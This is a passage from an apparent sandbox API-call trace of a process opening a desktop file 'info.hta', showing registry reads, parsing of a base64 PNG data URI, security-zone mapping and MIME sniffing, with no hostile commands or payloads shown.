lpThreadId=0x4d74f4*=0x738) returned 0x250 [0227.762] GetCurrentThreadId () returned 0x390 [0227.762] SetEvent (hEvent=0x24c) returned 1 [0227.762] IUnknown:Release (This=0x49d4bc) returned 0x6 [0227.762] IUnknown:Release (This=0x49d4bc) returned 0x5 [0227.762] IUnknown:AddRef (This=0x49d4bc) returned 0x6 [0227.762] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d504 | out: phkResult=0x41d504*=0x254) returned 0x0 [0227.762] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x41d508 | out: phkResult=0x41d508*=0x258) returned 0x0 [0227.762] RegOpenKeyExW (in: hKey=0x258, lpSubKey="FEATURE_BLOCK_LMZ_IMG", ulOptions=0x0, samDesired=0x1, phkResult=0x41d4c4 | out: phkResult=0x41d4c4*=0x0) returned 0x2 [0227.762] RegOpenKeyExW (in: hKey=0x254, lpSubKey="FEATURE_BLOCK_LMZ_IMG", ulOptions=0x0, samDesired=0x1, phkResult=0x41d4c4 | out: phkResult=0x41d4c4*=0x25c) returned 0x0 [0227.762] SHRegGetValueW () returned 0x2 [0227.763] SHRegGetValueW () returned 0x2 [0227.763] RegCloseKey (hKey=0x25c) returned 0x0 [0227.763] RegCloseKey (hKey=0x0) returned 0x6 [0227.763] RegCloseKey (hKey=0x0) returned 0x6 [0227.763] RegCloseKey (hKey=0x254) returned 0x0 [0227.763] RegCloseKey (hKey=0x258) returned 0x0 [0227.763] IUnknown:Release (This=0x49d4bc) returned 0x5 [0228.263] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", ppu=0x41d5a8 | out: ppu=0x41d5a8) returned 0x0 [0228.263] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41d5a8 | out: ppURI=0x41d5a8*=0x49d594) returned 0x0 [0228.263] ParseURLW (in: pcszURL="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", ppu=0x41d438 | out: ppu=0x41d438) returned 0x0 [0228.263] CreateUri (in: pwzURI="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x41d4f4 | out: ppURI=0x41d4f4*=0x49c07c) returned 0x0 [0228.264] IUnknown:QueryInterface (in: This=0x49c07c, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d4bc | out: ppvObject=0x41d4bc*=0x49c07c) returned 0x0 [0228.264] IUnknown:Release (This=0x49c07c) returned 0xd [0228.264] IUnknown:AddRef (This=0x49c07c) returned 0xe [0228.264] CoInternetCombineIUri (in: pBaseUri=0x49c07c, pRelativeUri=0x49d594, dwCombineFlags=0x6000000, ppCombinedUri=0x41d528, dwReserved=0x0 | out: ppCombinedUri=0x41d528*=0x49d594) returned 0x0 [0228.264] IUnknown:Release (This=0x49c07c) returned 0xd [0228.264] IUnknown:Release (This=0x49c07c) returned 0xc [0228.264] IUnknown:QueryInterface (in: This=0x49d594, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d47c | out: ppvObject=0x41d47c*=0x49d594) returned 0x0 [0228.264] IUnknown:Release (This=0x49d594) returned 0x3 [0228.264] IUnknown:AddRef (This=0x49d594) returned 0x4 [0228.264] IUri:GetAbsoluteUri (in: This=0x49d594, pbstrAbsoluteUri=0x41d470 | out: pbstrAbsoluteUri=0x41d470*="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x0 [0228.264] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xf4) returned 0x4f8578 [0228.264] IUnknown:AddRef (This=0x49d594) returned 0x5 [0228.264] IUnknown:QueryInterface (in: This=0x49d594, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d444 | out: ppvObject=0x41d444*=0x49d594) returned 0x0 [0228.264] IUnknown:Release (This=0x49d594) returned 0x5 [0228.264] IUnknown:AddRef (This=0x49d594) returned 0x6 [0228.265] IUri:GetScheme (in: This=0x49d594, pdwScheme=0x41d490 | out: pdwScheme=0x41d490*=0x0) returned 0x0 [0228.265] IUnknown:Release (This=0x49d594) returned 0x5 [0228.265] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4c) returned 0x4df9b0 [0228.265] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x48) returned 0x4bfdd0 [0228.265] IInternetSecurityManager:MapUrlToZone (in: This=0x4a2880, pwszUrl="file:///C:/Users/5p5NrGJn0jS%20HALPmcxz/Desktop/info.hta", pdwZone=0x41d488, dwFlags=0x0 | out: pdwZone=0x41d488*=0x0) returned 0x0 [0228.265] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1b0) returned 0x4f8678 [0228.265] IUnknown:QueryInterface (in: This=0x49d594, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d184 | out: ppvObject=0x41d184*=0x49d594) returned 0x0 [0228.265] IUnknown:Release (This=0x49d594) returned 0x5 [0228.265] IUnknown:AddRef (This=0x49d594) returned 0x6 [0228.265] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", ppu=0x41d148 | out: ppu=0x41d148) returned 0x0 [0228.265] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x470000) returned 1 [0228.265] IUnknown:AddRef (This=0x49d594) returned 0x7 [0228.265] IUnknown:AddRef (This=0x49d594) returned 0x8 [0228.265] IUnknown:QueryInterface (in: This=0x49d594, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d178 | out: ppvObject=0x41d178*=0x49d594) returned 0x0 [0228.265] IUnknown:Release (This=0x49d594) returned 0x8 [0228.265] IUnknown:AddRef (This=0x49d594) returned 0x9 [0228.265] IUri:GetScheme (in: This=0x49d594, pdwScheme=0x4f8780 | out: pdwScheme=0x4f8780*=0x0) returned 0x0 [0228.266] IUri:GetSchemeName (in: This=0x49d594, pbstrSchemeName=0x41d178 | out: pbstrSchemeName=0x41d178*="data") returned 0x0 [0228.266] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0228.266] IUnknown:QueryInterface (in: This=0x49d594, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x41d184 | out: ppvObject=0x41d184*=0x49d594) returned 0x0 [0228.266] IUnknown:Release (This=0x49d594) returned 0x9 [0228.266] IUnknown:AddRef (This=0x49d594) returned 0xa [0228.266] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x10) returned 0x4db380 [0228.266] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc) returned 0x4f8830 [0228.266] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x41d0f4 | out: ppURI=0x41d0f4*=0x49d594) returned 0x0 [0228.266] IUri:GetSchemeName (in: This=0x49d594, pbstrSchemeName=0x41d0d4 | out: pbstrSchemeName=0x41d0d4*="data") returned 0x0 [0228.266] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0228.266] IUri:GetPathAndQuery (in: This=0x49d594, pbstrPathAndQuery=0x41d100 | out: pbstrPathAndQuery=0x41d100*="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x0 [0228.266] IUnknown:Release (This=0x49d594) returned 0xa [0228.266] SysStringLen (param_1="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==") returned 0x4d9 [0228.266] CryptStringToBinaryW (in: pszString="iVBORw0KGgoAAAANSUhEUgAAAH4AAAAUCAQAAADhRUE/AAADW0lEQVR4Ad3WA4wnZxjA4efWZ1u1bdu2bdu2bdu2bUS127PN9TQ9TObLdP4zNb5fcLf75s0+yQiIcnpcDXaK/3+38NDFwb4XiRwLoMrZmjJ3NtkKd4pKNszikqeXl0tM/6Q3gEV8WnLzsxTDj7dmSXy1uzWIAnylo00R5eNzOl98dPeg5kL4+bxZcutkO8T43O5TZsdMfGvviQJ8pWNMFf0J+AEWjOkPZc8F+Pm8lTP5lDbF8ROsaruC+Hx6gM/tgnx6gM+nT7UJQrwGQw2c0QDDwgvMNXYujN8xoE80MG6ohgz8mHhmgOmiRN/op8yNorhmIxM7RyfwvbTxXGKy0TADwwzxgNZp/BDL66OfvuZ2U4D/0Zp2KIw/VZTYufUvO2fUx3IGZ+AP13PGTG97GieKm+501WqCe/h1S8Y7e9lfUwLf3feJq+tuc+kZppcOpPED9AFVTjE9uJzWJXHPv2LdoE19kYEfajPJ08dPGfhdAGv5XhRXO4NOywT+DfNInq0z8d/a2VrWSbWuZZX/Or7aqWl68LRvUhdUrzkDfxG/Cb+2H9L0AF9rfQriG9SqS6fJ69pI41Vm0GN8TiH+jN+EX9OPwQV/mmpCvGlWycfn9k4a/5O5Uxf8evxt+BODTYMty9+H/9EaPkvR/z58BzcH34QfWfTvww/Q34IuMnjW/xL0AD/Mi16Ke9ErxhfEL25ECTwd3JLi5+EPEiXwHdzhZS+FhX9lFr4PyizsPK/YgAz8vaoSVerg/UL4ubwiKomnnRs0hvyS+I0MCj9yVChLp9KBJuXjoYXWyjLxxd/zt1reSrNaO0GPNNg8wJ85a3IFG/k4vET1UB3jax0Y71zBLgYmJr/XC60sZ6UwKzg8+Hp4Q+tsPPgT8PWmxk0LPpse1S3A18ZzU9QG+Ne0Dz5ypid21iXmpjleBbY0ztRU9YnJMXbmr8Zn96geBPisam0fXPZZTXOCSuLP2+zG2FWLfw7/mJ4UxL+ifTY+oFeBLUzLoe+WpP9W/HCHF8Xn0PPxtXYgFz/NibPobb342+icO6PzHKt9SXyzoa6wmDLhqbK/82fsON+qWHPW/9Kd5wS9xMc2LnBuZuc7QltQaV/nZ07toRrQwynOK7FvC2V+11nHJZZV7n9zfgbFAebsYO1DaQAAAABJRU5ErkJggg==", cchString=0x4c8, dwFlags=0x1, pbBinary=0x4f89f8, pcbBinary=0x41d0cc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x4f89f8, pcbBinary=0x41d0cc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0228.266] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x14) returned 0x4da658 [0228.266] GetProcessHeap () returned 0x470000 [0228.266] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x394) returned 0x4f8dd8 [0228.266] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f89f8 | out: hHeap=0x470000) returned 1 [0228.266] lstrlenW (lpString="") returned 0 [0228.266] lstrlenW (lpString="image/png") returned 9 [0228.266] lstrlenW (lpString="") returned 0 [0228.266] StrCmpNICW (lpStr1="image/pn", lpStr2="text/css", nChar=8) returned -11 [0228.266] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x394) returned 0x4f89f8 [0228.266] lstrlenW (lpString="image/png") returned 9 [0228.266] FindMimeFromData (in: pBC=0x0, pwzUrl=0x0, pBuffer=0x4f89f8, cbSize=0x394, pwzMimeProposed="image/png", dwMimeFlags=0x2, ppwzMimeOut=0x4f8838, dwReserved=0x0 | out: ppwzMimeOut=0x4f8838*="image/x-png") returned 0x0 [0228.267] StrCmpICW (pszStr1="image/x-png", pszStr2="text/xml") returned -11 [0228.267] StrCmpNICW (lpStr1="image/x-", lpStr2="text/css", nChar=8) returned -11 [0228.267] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4f89f8 | out: hHeap=0x470000) returned 1 [0228.267] IUnknown:Release (This=0x49d594) returned 0x9 [0228.267] IUnknown:Release (This=0x49d594) returned 0x8 [0228.267] IUnknown:Release (This=0x49d594) returned 0x7 [0228.267] CoTaskMemFree (pv=0x0) [0228.268] GetCurrentThreadId () returned 0x390 [0228.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x9c2) returned 0x4f9178 [0228.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4db398 [0228.268] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4a8) returned 0x4f9b48 [0228.268] IUnknown:Release (This=0x49d594) returned 0x6 [0228.268] IUnknown:Release (This=0x49d594) returned 0x5 [0228.268] IUnknown:AddRef (This=0x49d594) returned 0x6 [0228.268] IUnknown:Release (This=0x49d594) returned 0x5 [0228.317] IsCharSpaceW 